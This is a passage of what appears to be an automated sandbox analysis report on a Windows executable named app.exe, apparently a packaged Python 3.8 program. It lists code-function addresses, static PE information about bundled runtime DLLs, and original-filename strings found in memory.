    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE912F40_2_00007FF7ACE912F4
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE98AD00_2_00007FF7ACE98AD0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE90AD40_2_00007FF7ACE90AD4
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA8A980_2_00007FF7ACEA8A98
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE81B900_2_00007FF7ACE81B90
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE9CB340_2_00007FF7ACE9CB34
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE92B340_2_00007FF7ACE92B34
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE90CE00_2_00007FF7ACE90CE0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE89CC00_2_00007FF7ACE89CC0
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE9F9380_2_00007FF7ACE9F938
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE964900_2_00007FF7ACE96490
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACEA2C600_2_00007FF7ACEA2C60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA4D502_2_00007FF7ACEA4D50
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA5C9C2_2_00007FF7ACEA5C9C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE91DA02_2_00007FF7ACE91DA0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE90EE42_2_00007FF7ACE90EE4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE96EC82_2_00007FF7ACE96EC8
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE94E802_2_00007FF7ACE94E80
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE9D6482_2_00007FF7ACE9D648
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE966442_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE9CFC82_2_00007FF7ACE9CFC8
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA4FCC2_2_00007FF7ACEA4FCC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE966442_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE867602_2_00007FF7ACE86760
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA57502_2_00007FF7ACEA5750
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE927302_2_00007FF7ACE92730
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA30FC2_2_00007FF7ACEA30FC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE910F02_2_00007FF7ACE910F0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA08E42_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE908D02_2_00007FF7ACE908D0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE9F9382_2_00007FF7ACE9F938
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE912F42_2_00007FF7ACE912F4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE98AD02_2_00007FF7ACE98AD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE90AD42_2_00007FF7ACE90AD4
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA8A982_2_00007FF7ACEA8A98
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE81B902_2_00007FF7ACE81B90
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE9CB342_2_00007FF7ACE9CB34
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE92B342_2_00007FF7ACE92B34
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE90CE02_2_00007FF7ACE90CE0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE89CC02_2_00007FF7ACE89CC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE9F9382_2_00007FF7ACE9F938
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACE964902_2_00007FF7ACE96490
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF7ACEA2C602_2_00007FF7ACEA2C60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E71FD02_2_00007FF8A7E71FD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E724402_2_00007FF8A7E72440
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E848202_2_00007FF8A7E84820
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E845D02_2_00007FF8A7E845D0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E91FF02_2_00007FF8A7E91FF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E929C02_2_00007FF8A7E929C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E92EC02_2_00007FF8A7E92EC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E924A02_2_00007FF8A7E924A0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E91D802_2_00007FF8A7E91D80
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7E935502_2_00007FF8A7E93550
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EA9B102_2_00007FF8A7EA9B10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EAB2102_2_00007FF8A7EAB210
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EE18F02_2_00007FF8A7EE18F0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EE12C02_2_00007FF8A7EE12C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7EE37582_2_00007FF8A7EE3758
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80179502_2_00007FF8A8017950
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80781502_2_00007FF8A8078150
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80669402_2_00007FF8A8066940
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80199602_2_00007FF8A8019960
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80339902_2_00007FF8A8033990
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80332702_2_00007FF8A8033270
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80753002_2_00007FF8A8075300
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A807A3502_2_00007FF8A807A350
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80703402_2_00007FF8A8070340
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8008B602_2_00007FF8A8008B60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8028BA02_2_00007FF8A8028BA0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80683D02_2_00007FF8A80683D0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80763C02_2_00007FF8A80763C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80053E02_2_00007FF8A80053E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8017BF02_2_00007FF8A8017BF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF3BF02_2_00007FF8A7FF3BF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80044302_2_00007FF8A8004430
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF34402_2_00007FF8A7FF3440
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8032C702_2_00007FF8A8032C70
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A802A4802_2_00007FF8A802A480
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8024CB02_2_00007FF8A8024CB0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A800A4A02_2_00007FF8A800A4A0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80274A02_2_00007FF8A80274A0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FFFCC02_2_00007FF8A7FFFCC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80164C02_2_00007FF8A80164C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A801ECC02_2_00007FF8A801ECC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A806CD402_2_00007FF8A806CD40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8009D902_2_00007FF8A8009D90
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8012DB02_2_00007FF8A8012DB0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8006DE02_2_00007FF8A8006DE0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8001DF02_2_00007FF8A8001DF0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A800AE102_2_00007FF8A800AE10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A803C6002_2_00007FF8A803C600
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A7FF8E502_2_00007FF8A7FF8E50
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A803D63C2_2_00007FF8A803D63C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80246402_2_00007FF8A8024640
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A803EE7C2_2_00007FF8A803EE7C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A800DED02_2_00007FF8A800DED0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80196C02_2_00007FF8A80196C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80266E02_2_00007FF8A80266E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8015F402_2_00007FF8A8015F40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80757902_2_00007FF8A8075790
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A801F7C02_2_00007FF8A801F7C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80748302_2_00007FF8A8074830
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80128202_2_00007FF8A8012820
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80378802_2_00007FF8A8037880
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BC1402_2_00007FF8A80BC140
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80CB1602_2_00007FF8A80CB160
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AFA302_2_00007FF8A80AFA30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B6A582_2_00007FF8A80B6A58
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BD2B02_2_00007FF8A80BD2B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DAAFC2_2_00007FF8A80DAAFC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C4B302_2_00007FF8A80C4B30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AB3382_2_00007FF8A80AB338
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B63C82_2_00007FF8A80B63C8
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D344C2_2_00007FF8A80D344C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BE4702_2_00007FF8A80BE470
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D54702_2_00007FF8A80D5470
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D4CA02_2_00007FF8A80D4CA0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BFCD02_2_00007FF8A80BFCD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C250C2_2_00007FF8A80C250C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D75402_2_00007FF8A80D7540
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C05602_2_00007FF8A80C0560
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DC6102_2_00007FF8A80DC610
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D9E182_2_00007FF8A80D9E18
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D66502_2_00007FF8A80D6650
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C0E3C2_2_00007FF8A80C0E3C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C66682_2_00007FF8A80C6668
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B5E602_2_00007FF8A80B5E60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AC6B02_2_00007FF8A80AC6B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80CA6C02_2_00007FF8A80CA6C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DFF062_2_00007FF8A80DFF06
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80B66FC2_2_00007FF8A80B66FC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C6EFC2_2_00007FF8A80C6EFC
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80CC7202_2_00007FF8A80CC720
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DBF182_2_00007FF8A80DBF18
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AD7B02_2_00007FF8A80AD7B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80BAFD02_2_00007FF8A80BAFD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80C57E02_2_00007FF8A80C57E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80D183C2_2_00007FF8A80D183C
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AE8D02_2_00007FF8A80AE8D0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81569002_2_00007FF8A8156900
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81391102_2_00007FF8A8139110
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81671502_2_00007FF8A8167150
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81859502_2_00007FF8A8185950
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816C1B02_2_00007FF8A816C1B0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81399902_2_00007FF8A8139990
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814B1902_2_00007FF8A814B190
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81789E02_2_00007FF8A81789E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A813C25F2_2_00007FF8A813C25F
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8136A402_2_00007FF8A8136A40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81622402_2_00007FF8A8162240
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81602502_2_00007FF8A8160250
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8169A502_2_00007FF8A8169A50
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A813A2902_2_00007FF8A813A290
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A815B2F02_2_00007FF8A815B2F0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8134AC02_2_00007FF8A8134AC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816CAC02_2_00007FF8A816CAC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814BB202_2_00007FF8A814BB20
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8159B302_2_00007FF8A8159B30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81523002_2_00007FF8A8152300
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8172B102_2_00007FF8A8172B10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814CB802_2_00007FF8A814CB80
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81583802_2_00007FF8A8158380
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81573E02_2_00007FF8A81573E0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81533F02_2_00007FF8A81533F0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A815DBC02_2_00007FF8A815DBC0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8136C202_2_00007FF8A8136C20
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816D4002_2_00007FF8A816D400
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8139C102_2_00007FF8A8139C10
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81754102_2_00007FF8A8175410
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81354602_2_00007FF8A8135460
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8183C602_2_00007FF8A8183C60
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A814FC402_2_00007FF8A814FC40
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81384502_2_00007FF8A8138450
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816B4C02_2_00007FF8A816B4C0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8165CD02_2_00007FF8A8165CD0
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A815ED302_2_00007FF8A815ED30
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81375102_2_00007FF8A8137510
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A81825602_2_00007FF8A8182560
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A8172D702_2_00007FF8A8172D70
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A816DD402_2_00007FF8A816DD40
    Source: C:\Users\user\Desktop\app.exeCode function: String function: 00007FF7ACE82770 appears 82 times
    Source: C:\Users\user\Desktop\app.exeCode function: String function: 00007FF8A7FF1010 appears 33 times
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: Number of sections : 19 > 10
    Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: python3.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
    Source: app.exe, 00000000.00000003.2042990999.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2069526633.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython38.dll. vs app.exe
    Source: app.exe, 00000000.00000003.2042754649.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2043573928.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2043165569.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2043753016.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2065300769.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs app.exe
    Source: app.exe, 00000000.00000003.2042220965.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2041370917.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041888729.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041742051.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2043495149.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs app.exe
    Source: app.exe, 00000000.00000003.2068834317.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2070438839.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepywintypes38.dll0 vs app.exe
    Source: app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2040760491.0000022254575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2041962953.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2042670052.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041226515.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_win32sysloader.pyd0 vs app.exe
    Source: app.exe, 00000000.00000003.2042580638.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2038656903.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcp140.dllT vs app.exe
    Source: app.exe, 00000000.00000003.2042415024.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2044637351.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041668057.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2044508949.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2044240662.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041595247.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2042333645.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2043073708.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2042910662.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2043836755.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2043659043.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
